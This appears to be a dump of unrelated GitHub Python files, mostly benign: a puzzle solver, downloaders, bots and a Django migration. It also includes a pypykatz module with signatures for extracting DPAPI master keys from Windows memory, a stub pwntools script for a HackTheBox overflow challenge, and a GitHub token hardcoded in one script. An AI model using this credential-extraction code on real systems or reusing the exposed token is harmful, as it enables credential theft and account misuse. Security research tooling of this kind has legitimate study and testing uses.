res:\n raise ValueError(line)\n instr, x, y = res.groups()\n method = {\n 'AND': self._and,\n 'OR': self._or,\n 'NOT': self._not,\n }[instr]\n _reg = dict(self.registers)\n print(_reg)\n\n method(x, y)\n\n print(f'{instr} {x} {y}')\n print('{}'.format({k: v for k, v in self.registers.items() if v != _reg[k]}))\n\n res = False\n if self.registers['J']:\n print('jump!')\n res = True\n\n print()\n return res\n\n def _get_walk_program(self):\n \"\"\"\n There are only three instructions available in springscript:\n\n AND X Y sets Y to true if both X and Y are true; otherwise, it sets Y to false.\n OR X Y sets Y to true if at least one of X or Y is true; otherwise, it sets Y to false.\n NOT X Y sets Y to true if X is false; otherwise, it sets Y to false.\n\n Returns:\n list of int: ASCII code\n\n \"\"\"\n # _jump_if_ground4 = '''\n # OR {} J # jump if ground in 4 steps\n # _jump_if_ground4 = 'OR E J'\n _jump_if_ground4 = '''\n OR D J\n {}\n '''.format(\n '' if not self.extended_mode\n else '''\n OR H T\n OR E T\n AND T J\n '''\n )\n\n _but_dont_jump_if_no_hole = '''\n NOT A T # 1 if need jump\n NOT T T # 0 if need jump\n AND B T # 0 if need jump\n AND C T # 0 if need jump (one of three tiles has hole)\n {}\n NOT T T # 1 if need jump\n AND T J\n '''.format(\n # '\\n'.join(('AND {} T'.format(s) for s in 'DEF')) if self.extended_mode\n '' if self.extended_mode\n else ''\n )\n\n do = 'RUN' if self.extended_mode else 'WALK'\n _program = f'''\n {_jump_if_ground4}\n \n {_but_dont_jump_if_no_hole}\n \n {do}\n '''\n program = []\n for _line in _program.split('\\n'):\n line = _line.strip()\n if not line:\n continue\n if line.startswith('#'):\n continue\n comment_idx = line.find('#')\n if comment_idx > -1:\n line = line[:comment_idx]\n if not line:\n continue\n\n for idx, symbol in enumerate(reversed(line)):\n if symbol.isalpha():\n break\n\n line = line[:-idx]\n\n program.append(line)\n\n if self.extended_mode:\n # self._test(program, [1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, ])\n\n # bad = '#####..#@########'\n # bad = '#####...#########'\n # bad = '#####..#.########'\n # bad = '#####.#.#...#.###'\n bad = '##.#.#...#.###'\n map = [{'#': 1}.get(x, 0) for x in bad]\n assert not self._test(program, map)\n\n bad = '##...#########'\n map = [{'#': 1}.get(x, 0) for x in bad]\n assert not self._test(program, map)\n else:\n self._test(program, [1, 1, 1, 1, 1, 0, 1])\n\n codes = []\n for instruction in program:\n codes.extend(self._get_string_in_ascii(instruction))\n\n return codes\n\n def get_amout_of_hull_damage(self):\n try:\n for out in self.computer.gen:\n print(f'{chr(out)}', end='')\n except NoSignal:\n # now enter the program\n for instruction_code in self._get_walk_program():\n print(f'{chr(instruction_code)}', end='')\n self.computer.feed(instruction_code)\n\n try:\n for out in self.computer.gen:\n print(f'{chr(out)}', end='')\n except ValueError:\n return out\n\n\ndef part1(*args, **kwargs):\n return SpringScript(*args, **kwargs).get_amout_of_hull_damage()\n\n\ndef part2(*args, **kwargs):\n return SpringScript(extended_mode=True).get_amout_of_hull_damage()\n\n\nif __name__ == '__main__':\n for res in (\n part1(),\n part2(),\n ):\n print(res)\n","repo_name":"nerewarin/adventofcode2019","sub_path":"21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":6962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27463655852","text":"import yt_dlp as youtube_dl\r\n\r\n# URL of the video\r\nurl = input(\"Enter the video URL: 
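# Quick check of the ASCII framing used by _get_string_in_ascii above:
# each instruction is sent as its character codes plus a terminating 10 ('\n').
assert [ord(c) for c in 'WALK'] + [10] == [87, 65, 76, 75, 10]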
\")\r\n\r\n# Set options for yt_dlp to fetch available formats\r\nydl_opts = {\r\n    'format': 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best',\r\n}\r\n\r\n# Fetch available formats for the video\r\nwith youtube_dl.YoutubeDL(ydl_opts) as ydl:\r\n    info_dict = ydl.extract_info(url, download=False)\r\n    formats = info_dict.get('formats', [])\r\n\r\n# Create a dictionary to store unique video quality options\r\nunique_qualities = {}\r\n\r\n# Identify unique video quality options and store them in the dictionary\r\nfor format_info in formats:\r\n    if format_info['vcodec'] != 'none':\r\n        resolution = format_info['resolution'] if 'resolution' in format_info else 'Unknown'\r\n        format_note = format_info.get('format_note', 'Unknown')\r\n        unique_qualities[resolution] = format_note\r\n\r\n# Display the unique video quality options\r\nprint(\"Available video quality options:\")\r\nfor i, (resolution, format_note) in enumerate(unique_qualities.items(), start=1):\r\n    print(f\"{i}. {resolution} - {format_note}\")\r\n\r\n# Ask the user to choose the desired video quality by entering the option number\r\nwhile True:\r\n    try:\r\n        choice = int(input(\"Enter the number of the desired video quality: \"))\r\n        if 1 <= choice <= len(unique_qualities):\r\n            selected_quality = list(unique_qualities.keys())[choice - 1]\r\n            break\r\n        else:\r\n            print(\"Invalid choice. Please enter a valid option number.\")\r\n    except ValueError:\r\n        print(\"Invalid input. Please enter a valid option number.\")\r\n\r\n# Filter the video formats based on the selected quality\r\nselected_formats = [format_info for format_info in formats if format_info['resolution'] == selected_quality]\r\n\r\nif not selected_formats:\r\n    print(\"No video format available in the selected quality.\")\r\nelse:\r\n    # Download one video from the selected quality\r\n    ydl_opts['format'] = selected_formats[0]['format_id']\r\n    with youtube_dl.YoutubeDL(ydl_opts) as ydl:\r\n        ydl.download([url])\r\n\r\n    print(\"The requested video has been downloaded.\")\r\n","repo_name":"gurungsuresh13/YouTube-Video-Downloader","sub_path":"youtube_video_downloader.py","file_name":"youtube_video_downloader.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"41854077121","text":"import os\nimport spotipy\nimport requests\n\n# the client credentials were left undefined; read them from the environment\n# (the environment variable names below are assumed, not part of the source)\nspotify_client = os.environ[\"SPOTIFY_CLIENT_ID\"]\nspotify_secret = os.environ[\"SPOTIFY_CLIENT_SECRET\"]\nspotify = spotipy.oauth2.SpotifyOAuth(scope=\"playlist-modify-private\", client_id=spotify_client, client_secret=spotify_secret, redirect_uri=\"https://example.com\", cache_path=\"token.txt\")\n\nsp = spotipy.client.Spotify(auth_manager=spotify)\ntrack = sp.search(\"track:Sanctuary artist:Joji\", limit=1, type=\"track\")\nprint(track[\"tracks\"][\"items\"][0][\"external_urls\"][\"spotify\"])\n\n# requests.post(\"https://api.spotify.com/v1/users/989ucp29eddsikxpnaxflcxhr/playlists\")","repo_name":"fnilvuwu/100-days-of-code-python","sub_path":"spotify-playlist/tes_spotify.py","file_name":"tes_spotify.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"73540486888","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport filebrowser.fields\nimport ckeditor.fields\n\n\nclass Migration(migrations.Migration):\n    dependencies = [\n        ('events', '0002_auto_20150416_2301'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            
name='EventProgramation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('name', models.CharField(max_length=100, verbose_name='Nome')),\n ('image', filebrowser.fields.FileBrowseField(\n help_text='Para n\\xe3o distorcer, envie uma imagem com resolu\\xe7\\xe3o m\\xe1xima de 200x200px.',\n max_length=200, null=True, verbose_name='Imagem', blank=True)),\n ('date_time', models.DateTimeField(verbose_name='Data e Hora')),\n ('active', models.CharField(default=b'S', max_length=1, verbose_name='Exibir',\n choices=[(b'Y', 'Sim'), (b'N', 'N\\xe3o')])),\n ('description',\n ckeditor.fields.RichTextField(max_length=1000, verbose_name='Descri\\xe7\\xe3o', blank=True)),\n ],\n options={\n 'ordering': ['-name', '-description'],\n 'db_table': 'event_programation',\n 'verbose_name': 'Programa\\xe7\\xe3o',\n 'verbose_name_plural': 'Programa\\xe7\\xf5es',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"roberzguerra/scout","sub_path":"events/migrations/0003_eventprogramation.py","file_name":"0003_eventprogramation.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74365114406","text":"import os\r\nimport time\r\nimport re\r\nfrom slackclient import SlackClient\r\n\r\n# instantiate Slack client\r\nslack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))\r\n# starterbot's user ID in Slack: value is assigned after the bot starts up\r\nstarterbot_id = None\r\n\r\n# constants\r\nRTM_READ_DELAY = 1 # 1 second delay between reading from RTM\r\nEXAMPLE_COMMAND = \"!themify\"\r\nMENTION_REGEX = \"^<@(|[WU].+?)>(.*)\"\r\n\r\ngenre_counter = {\r\n \"fantasy\": 0,\r\n \"horror\": 0,\r\n \"adventure\": 0,\r\n \"sci-fi\": 0,\r\n \"mystery\": 6,\r\n \"action\": 0,\r\n \"crime\": 0,\r\n \"romance\": 0,\r\n \"comedy\": 0,\r\n \"thriller\": 0,\r\n \"drama\": 0\r\n}\r\n\r\ngenre_colors = {\r\n \"horror\": [0xAC813D, 0xAC813D,0x6F6F6F, 0xFFFFFF, 0x6F6F6F, 0xFFFFFF, 0x6F6F6F, 0x6F6F6F],\r\n \"adventure\": [0x705116, 0x379114,0x1b480a, 0xFFFFFF, 0x1b480a, 0xFFFFFF, 0x1b480a, 0x1b480a],\r\n \"comedy\": [0xe6e600,0x999999,0x999999,0x000000,0x4da6ff,0x000000,0xb3b3b3,0xb3b3b3],\r\n \"fantasy\": [0x379114, 0xAC813D,0x1b480a, 0xFFFFFF, 0x1b480a, 0xFFFFFF, 0x1b480a, 0x1b480a],\r\n \"drama\": [0x8000ff,0x4d0099,0xFF4DC4,0xffffff,0x4d0099,0xFFFFFF,0x00FFB7,0xFF4DC4],\r\n \"sci-fi\": [0x1a1aff,0xe60000,0x7300e6,0xFFFFFF,0xb30000,0xFFFFFF,0xff1a1a,0xff1a1a],\r\n \"mystery\": [0x4D5250,0x444A47,0xD39B46,0xFFFFFF,0x434745,0xFFFFFF,0x99D04A,0xDB6668],\r\n \"crime\": [0xcc6600,0x994d00,0x994d00,0xFFFFFF,0xb36b00,0xFFFFFF,0x994d00,0x994d00],\r\n \"action\": [0xff0000,0x1a1aff,0x000099,0xFFFFFF,0x1a1aff,0xFFFFFF,0x1a1aff,0x9999ff],\r\n \"thriller\": [0x101010, 0x101010, 0x5df322, 0xFFFFFF, 0x5df322, 0xFFFFFF, 0x5df322, 0x5df322],\r\n \"romance\": [0xFF847C,0xBB76E7,0xbb76e7,0xFFFFFF,0xbb76e7,0xFFFFFF,0xbb76e7,0xbb76e7],\r\n \"default\": [0xF8F8FA,0xF8F8FA,0x2D9EE0,0xFFFFFF,0xFFFFFF,0x383F45,0x60D156,0xDC5960]\r\n}\r\n\r\n\r\ndef find_dominant_genre():\r\n maxVal = 0\r\n diff = 0\r\n cur_genre = ''\r\n for key in genre_counter:\r\n if genre_counter[key] - maxVal > diff:\r\n diff = genre_counter[key] - maxVal\r\n maxVal = genre_counter[key]\r\n cur_genre = key\r\n return (diff, cur_genre)\r\n\r\n #(genre_1, val_1), (genre_2, val_2) = sorted(d.items(), 
key=lambda x: x[1], reverse=True)[:2]\r\n\r\ndef find_cur_hex_code():\r\n diff, cur_genre = find_dominant_genre()\r\n if not cur_genre:\r\n return genre_colors[\"default\"]\r\n ans = []\r\n print(diff, cur_genre)\r\n for i in range(8):\r\n default_val = (10-diff)* int(genre_colors[\"default\"][i])\r\n genre_val = diff * int(genre_colors[cur_genre][i])\r\n print(genre_colors[\"default\"][i], genre_colors[cur_genre][i])\r\n print(default_val, genre_val)\r\n ans.append(hex(int((default_val + genre_val)/10)))\r\n #return [hex((10-diff)/10 * genre_colors[\"default\"][i] + diff/10 * genre_colors[cur_genre][i]) for i in range(8)]\r\n return ans\r\n\r\ndef hex_code_as_string():\r\n hex_code = find_cur_hex_code()\r\n ans = \"\"\r\n for i in range(7):\r\n ans += '#' + str(hex_code[i])[2:] + ', '\r\n ans += '#' + str(hex_code[7])[2:]\r\n return ans\r\n\r\ndef parse_bot_commands(slack_events):\r\n \"\"\"\r\n Parses a list of events coming from the Slack RTM API to find bot commands.\r\n If a bot command is found, this function returns a tuple of command and channel.\r\n If its not found, then this function returns None, None.\r\n \"\"\"\r\n for event in slack_events:\r\n if event[\"type\"] == \"message\" and not \"subtype\" in event and event[\"channel\"] == \"GCUAGSGTU\":\r\n print(event[\"text\"])\r\n user_id, message = parse_direct_mention(event[\"text\"])\r\n if user_id == starterbot_id:\r\n return message, event[\"channel\"]\r\n return None, None\r\n\r\ndef parse_direct_mention(message_text):\r\n \"\"\"\r\n Finds a direct mention (a mention that is at the beginning) in message text\r\n and returns the user ID which was mentioned. If there is no direct mention, returns None\r\n \"\"\"\r\n matches = re.search(MENTION_REGEX, message_text)\r\n # the first group contains the username, the second group contains the remaining message\r\n return (matches.group(1), matches.group(2).strip()) if matches else (None, None)\r\n\r\ndef handle_command(command, channel):\r\n \"\"\"\r\n Executes bot command if the command is known\r\n \"\"\"\r\n # Default response is help text for the user\r\n default_response = \"Not sure what you mean. Try *{}*.\".format(EXAMPLE_COMMAND)\r\n\r\n # Finds and executes the given command, filling in response\r\n response = None\r\n # This is where you start to implement more commands!\r\n if command.startswith(EXAMPLE_COMMAND):\r\n response = hex_code_as_string()\r\n\r\n # Sends the response back to the channel\r\n slack_client.api_call(\r\n \"chat.postMessage\",\r\n channel=channel,\r\n text=response or default_response\r\n )\r\n\r\nif __name__ == \"__main__\":\r\n if slack_client.rtm_connect(with_team_state=False):\r\n print(\"Genrelize Bot connected and running!\")\r\n # Read bot's user ID by calling Web API method `auth.test`\r\n starterbot_id = slack_client.api_call(\"auth.test\")[\"user_id\"]\r\n while True:\r\n command, channel = parse_bot_commands(slack_client.rtm_read())\r\n if command:\r\n handle_command(command, channel)\r\n time.sleep(RTM_READ_DELAY)\r\n else:\r\n print(\"Connection failed. 
Exception traceback printed above.\")\r\n","repo_name":"YamenAlmasalmeh/HackRice_Genrelize","sub_path":"genrelize.py","file_name":"genrelize.py","file_ext":"py","file_size_in_byte":5387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"39890366399","text":"#!/usr/bin/python3\n\nfrom pwn import *\n\n\ndef start():\n    \n    file_name = './bad_grades'\n\n    if len(sys.argv) > 1:\n        if sys.argv[1] == 'gdb':\n            gdbscript = 'continue'\n            return gdb.debug(file_name, gdbscript=gdbscript)\n        else:\n            host, port = sys.argv[2:]\n            return remote(host, port)\n    return process(file_name)\n\n\ndef main():\n    \n\n    length = int(sys.argv[1])\n\n    print (2)\n    print(length)\n    for i in cyclic(length).decode():\n        print(i)\n    \n    sys.exit()\n\n    io = start()\n\n    io.sendlineafter('>', '2')\n    # io.recvline()\n    io.sendline('50')\n    # io.sendlineafter(':', '50')\n    \n    payload = cyclic(50)\n\n    for i in range(50):\n        io.sendlineafter(':', payload[i])\n\n    io.interactive()\n\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"psanjay679/htb","sub_path":"pwn/bad_grades/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"6378306112","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct  4 08:49:57 2017\n\n@author: jean-marcsevin\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nurl = 'https://gist.github.com/paulmillr/2657075'\n\ndef get_soup(url):\n    r = requests.get(url)\n    soup = BeautifulSoup(r.text, 'html.parser')\n    return soup\n\ndef get_repos(user):\n    r = requests.get('https://api.github.com/users/' + user + '/repos', {'type': 'owner'}, auth = ('jmsevin', '7a48e19ed3b70887e57a25694e3e42b916a70244'))\n    return r.json()\n\ndef calc_stars_mean(repos):\n    sm = pd.Series([repo['stargazers_count'] for repo in repos]).mean()\n    return sm\n\ndef get_user_stars_mean(user):\n    usm = calc_stars_mean(get_repos(user))\n    return usm\n    \nsoup = get_soup(url)\n\nrows = soup.find('tbody').find_all('tr')\nusers = [row.find('a').text for row in rows]\nstars = [calc_stars_mean(get_repos(user)) for user in users]\n\nclassement = pd.DataFrame({'Utilisateur': users, 'Moyenne': stars})\nclassement = classement[['Utilisateur', 'Moyenne']].sort_values('Moyenne', ascending = False)","repo_name":"MS-BGD-2018-KIT-BIGDATA/JeanMarc_SEVIN","sub_path":"Lesson3/exo_dom_lesson_03.py","file_name":"exo_dom_lesson_03.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16265411878","text":"def groupcount(x,c) :\n    while x != '':\n        if x[1:].find(x[0]) < 1:\n            x = x[1:]\n        else:\n            c += 0\n            break\n    else:\n        c += 1\n    return c\n\nN = int(input())\ni = 0\nfor _ in range(N) :\n    s = input()\n    i = groupcount(s,i)\nprint(i)\n\n\n","repo_name":"haesoo-y/Baekjoon_Online_Judge_Python","sub_path":"01-09/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"21621255567","text":"\"\"\"\nModule gamepref.\nDisplays the game's victory screen.\n\"\"\"\n\nimport math, os\nimport pygame\nfrom pygame.locals import *\nimport game, gfx, snd, txt\nimport gameplay, gamemenu\n\n#Nothing too exciting, huh? 
=)\ncheer = (\n    'Congratulations!',\n    ' ',\n    'You won the game!!!',\n    ' ',\n)\n\n#Fonts used to draw the message\nfonts = []\n\ndef load_game_resources():\n    \"\"\"\n    Loads the resources needed to build the final\n    screen\n    \"\"\"\n    global fonts\n    fontname = 'stencil'\n    fonts.append(txt.Font(fontname, 28))\n    snd.preload('select_choose')\n\nclass GameWin:\n    \"\"\"\n    Definition of the victory screen.\n    \"\"\"\n    def __init__(self, prevhandler):\n        self.prevhandler = prevhandler\n        self.done = 0\n        self.top = gfx.rect.centery\n        self.center = gfx.rect.centerx\n        self.text = []\n        self.time = 0.0\n        font = fonts[0]\n        for line in cheer:\n            img, r = font.text((255, 255, 0), line, (self.center, self.top))\n            self.top += 30\n            self.text.append((img, r))\n\n    def quit(self):\n        r = gfx.surface.fill((0, 0, 0), gfx.surface.get_rect())\n        gfx.dirty(r) \n        game.handler = self.prevhandler\n        self.done = 1\n        snd.play('select_choose')\n        \n    def input(self, i):\n        if self.time > 30.0:\n            self.quit()\n\n    def event(self, e):\n        pass\n\n    def run(self):\n        if self.done: return\n        for line in self.text:\n            img, r = line\n            gfx.surface.blit(img, r)\n            gfx.dirty(r)\n\n        ratio = game.clockticks / 25\n        speedadjust = max(ratio, 1.0)\n        self.time += speedadjust\n\n    def background(self, area):\n        return gfx.surface.fill((0, 0, 0), area)","repo_name":"resilva87/py1945game","sub_path":"gamewin.py","file_name":"gamewin.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"20123506652","text":"#!/usr/bin/env python3\n#\n# Author:\n#  Tamas Jos (@skelsec)\n#\n\n\nfrom pypykatz.commons.common import WindowsMinBuild, KatzSystemArchitecture, WindowsBuild\nfrom pypykatz.alsadecryptor.win_datatypes import LUID, GUID, POINTER, FILETIME, ULONG\nfrom pypykatz.alsadecryptor.package_commons import PackageTemplate\n\nclass DpapiTemplate(PackageTemplate):\n\tdef __init__(self):\n\t\tsuper().__init__('Dpapi')\n\t\tself.signature = None\n\t\tself.first_entry_offset = None\n\t\tself.list_entry = None\n\t\t\n\t@staticmethod\n\tdef get_template(sysinfo):\n\t\ttemplate = DpapiTemplate()\n\t\ttemplate.list_entry = PKIWI_MASTERKEY_CACHE_ENTRY\n\t\ttemplate.log_template('list_entry', template.list_entry)\n\t\t\n\t\tif sysinfo.architecture == KatzSystemArchitecture.X64:\t\n\t\t\tif sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:\n\t\t\t\ttemplate.signature = b'\\x4d\\x3b\\xee\\x49\\x8b\\xfd\\x0f\\x85'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:\n\t\t\t\ttemplate.signature = b'\\x49\\x3b\\xef\\x48\\x8b\\xfd\\x0f\\x84'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:\n\t\t\t\ttemplate.signature = b'\\x33\\xc0\\xeb\\x20\\x48\\x8d\\x05'\n\t\t\t\ttemplate.first_entry_offset = 7\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:\n\t\t\t\ttemplate.signature = b'\\x4c\\x89\\x1f\\x48\\x89\\x47\\x08\\x49\\x39\\x43\\x08\\x0f\\x85'\n\t\t\t\ttemplate.first_entry_offset = -4\n\n\t\t\telif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1507.value:\n\t\t\t\ttemplate.signature = b'\\x08\\x48\\x39\\x48\\x08\\x0f\\x85'\n\t\t\t\ttemplate.first_entry_offset = -10\n\n\t\t\telif WindowsBuild.WIN_10_1507.value <= sysinfo.buildnumber < WindowsBuild.WIN_10_1607.value:\n\t\t\t\ttemplate.signature = 
b'\\x48\\x89\\x4e\\x08\\x48\\x39\\x48\\x08'\n\t\t\t\ttemplate.first_entry_offset = -7\n\t\t\t\t\n\t\t\telif sysinfo.buildnumber >= WindowsBuild.WIN_10_1607.value:\n\t\t\t\ttemplate.signature = b'\\x48\\x89\\x4f\\x08\\x48\\x89\\x78\\x08'\n\t\t\t\ttemplate.first_entry_offset = 11\n\t\t\t\n\t\t\telse:\n\t\t\t\t#currently this doesnt make sense, but keeping it here for future use\n\t\t\t\traise Exception('Could not identify template! Architecture: %s sysinfo.buildnumber: %s' % (sysinfo.architecture, sysinfo.buildnumber))\n\t\t\t\n\t\t\n\t\telif sysinfo.architecture == KatzSystemArchitecture.X86:\n\t\t\tif sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:\n\t\t\t\ttemplate.signature = b'\\x33\\xc0\\x40\\xa3'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\t\n\t\t\telif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:\n\t\t\t\ttemplate.signature = b'\\x8b\\xf0\\x81\\xfe\\xcc\\x06\\x00\\x00\\x0f\\x84'\n\t\t\t\ttemplate.first_entry_offset = -16\n\t\t\t\t\n\t\t\telif sysinfo.buildnumber >= WindowsMinBuild.WIN_BLUE.value:\n\t\t\t\ttemplate.signature = b'\\x33\\xc0\\x40\\xa3'\n\t\t\t\ttemplate.first_entry_offset = -4\n\t\t\t\n\t\telse:\n\t\t\traise Exception('Unknown architecture! %s' % sysinfo.architecture)\n\n\t\t\t\n\t\treturn template\t\n\t\n\nclass PKIWI_MASTERKEY_CACHE_ENTRY(POINTER):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\n\t@staticmethod\n\tasync def load(reader):\n\t\tp = PKIWI_MASTERKEY_CACHE_ENTRY()\n\t\tp.location = reader.tell()\n\t\tp.value = await reader.read_uint()\n\t\tp.finaltype = KIWI_MASTERKEY_CACHE_ENTRY\n\t\treturn p\n\n\t\t\nclass KIWI_MASTERKEY_CACHE_ENTRY:\n\tdef __init__(self):\n\t\tself.Flink = None\n\t\tself.Blink = None\n\t\tself.LogonId = None\n\t\tself.KeyUid = None\n\t\tself.insertTime = None\n\t\tself.keySize = None\n\t\tself.key = None\n\t\n\t@staticmethod\n\tasync def load(reader):\n\t\tres = KIWI_MASTERKEY_CACHE_ENTRY()\n\t\tres.Flink = await PKIWI_MASTERKEY_CACHE_ENTRY.load(reader)\n\t\tres.Blink = await PKIWI_MASTERKEY_CACHE_ENTRY.load(reader)\n\t\tres.LogonId = await LUID.loadvalue(reader)\n\t\tres.KeyUid = await GUID.loadvalue(reader)\n\t\tres.insertTime = await FILETIME.load(reader)\n\t\tres.keySize = await ULONG.loadvalue(reader)\n\t\tif res.keySize < 512:\n\t\t\tres.key = await reader.read(res.keySize)\n\t\telse:\n\t\t\tres.key = None\n\t\treturn res\n","repo_name":"skelsec/pypykatz","sub_path":"pypykatz/alsadecryptor/packages/dpapi/templates.py","file_name":"templates.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":2505,"dataset":"github-code","pt":"53"} +{"seq_id":"25467315387","text":"import os\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"dataset_path\", type=str, default=\"\", help=\"path to the image dataset\")\n parser.add_argument(\"label_path\", type=str, default=\"\", help=\"path to the label file (txt)\")\n args = parser.parse_args()\n\n # get the contents of the directory\n contents = os.listdir(args.dataset_path)\n\n # get all png files\n contents = list(filter(lambda x: x.lower().endswith(\".png\"), contents))\n\n labels = dict()\n\n with open(args.label_path, mode=\"r\") as f:\n found_format_line = False\n\n # search for the format line 'imagename|x1|y1|x2|y2' line by line\n # labels are saved directly after this line\n for line in f:\n if \"imagename|x1|y1|x2|y2\" in line:\n found_format_line = True\n break\n\n # if format line was found, extract labels line by line\n if 
found_format_line:\n # starting at the first label-line\n for line in f:\n filename, x1, y1, x2, y2 = line.split(\"|\")\n labels[filename] = {\"x1\": x1.strip(),\n \"y1\": y1.strip(),\n \"x2\": x2.strip(),\n \"y2\": y2.strip()}\n\n # image and label information\n print()\n print(\"comparing dataset '{}' with label txt '{}'\".format(args.dataset_path.split(\"/\")[-1],\n args.label_path.split(\"/\")[-1]))\n print()\n print(\"dataset '{1}'\\n-> contains {0} png files\".format(len(contents), args.dataset_path))\n print()\n print(\"label txt '{1}'\\n-> contains {0} labels\".format(len(labels.keys()), args.label_path))\n print()\n\n # compute difference\n set_pngs = set(contents)\n set_labels = set(labels.keys())\n\n diff = sorted(set_pngs.symmetric_difference(set_labels))\n\n print(\"symmetric difference of dataset and labels contains {} entries\".format(len(diff)))\n\n print()\n print(\"files that are missing in labels txt:\")\n for i, file in enumerate(set_pngs.difference(set_labels)):\n print(\"#{} -> {}\".format(i, file))\n\n print()\n print(\"files that are missing in dataset:\")\n for i, file in enumerate(set_labels.difference(set_pngs)):\n print(\"#{} -> {}\".format(i, file))\n\n\n","repo_name":"bit-bots/imagetagger","sub_path":"util/compare_files.py","file_name":"compare_files.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":252,"dataset":"github-code","pt":"53"} +{"seq_id":"14416198211","text":"# This is a sample Python script.\n\n# Press Maj+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport keyboard\n\ndef transcribe_speech(language='en-US', file_path=None):\n # Initialize recognizer class\n r = sr.Recognizer()\n\n with sr.Microphone() as source:\n st.info(\"Speak now...\")\n\n try:\n # Set the language for speech recognition\n r.energy_threshold = 4000\n r.dynamic_energy_adjustment_ratio = 1.5\n r.pause_threshold = 0.8\n r.phrase_threshold = 0.3\n r.non_speaking_duration = 0.3\n r.operation_timeout = 5\n\n # listen for speech and store in audio_text variable\n audio_text = r.listen(source, phrase_time_limit=10) # Set a time limit for each phrase\n\n st.info(\"Transcribing...\")\n st.write(\"Press 'P' to pause or 'R' to resume\")\n\n # Variables for pause and resume functionality\n paused = False\n resumed = False\n\n while not resumed:\n try:\n # Check if user pressed 'P' to pause\n if keyboard.is_pressed('p'):\n paused = True\n st.info(\"Paused. Press 'R' to resume\")\n\n if paused:\n # Check if user pressed 'R' to resume\n if keyboard.is_pressed('r'):\n paused = False\n resumed = True\n st.info(\"Resumed. 
Continue speaking...\")\n\n if not paused:\n # using Google Speech Recognition with the specified language\n text = r.recognize_google(audio_text, language=language)\n if file_path:\n with open(file_path, 'w') as file:\n file.write(text)\n st.write(\"Transcribed text saved to file:\", file_path)\n return text\n\n except sr.UnknownValueError:\n return \"Sorry, I could not understand what you said.\"\n except sr.RequestError:\n return \"Sorry, there was an issue with the speech recognition service.\"\n\n except Exception as e:\n return \"Sorry, there was an issue accessing the microphone: {}\".format(e)\n\n\n\n\n\n\n\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n import streamlit as st\n import speech_recognition as sr\n\n\n def main():\n st.title(\"Speech Recognition App\")\n st.write(\"Click on the microphone to start speaking:\")\n\n # add a button to trigger speech recognition\n if st.button(\"Start Recording\"):\n file_path = \"transcription.txt\" # Specify the desired file path\n language = st.text_input(\"Enter the language code (e.g., en-US for English (US)): \", value='en-US')\n text = transcribe_speech(language=language, file_path=file_path)\n st.write(\"Transcription:\", text)\n\n\n if __name__ == \"__main__\":\n main()\n","repo_name":"amalaraoudd/speechrecognition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18095303101","text":"\"\"\"\n\ntests/test_plane.py\n\nwritten by: Oliver Cordes 2019-07-26\nchanged by: Oliver Cordes 2019-07-27\n\n\"\"\"\n\nfrom pycollision.objects import Plane\nfrom 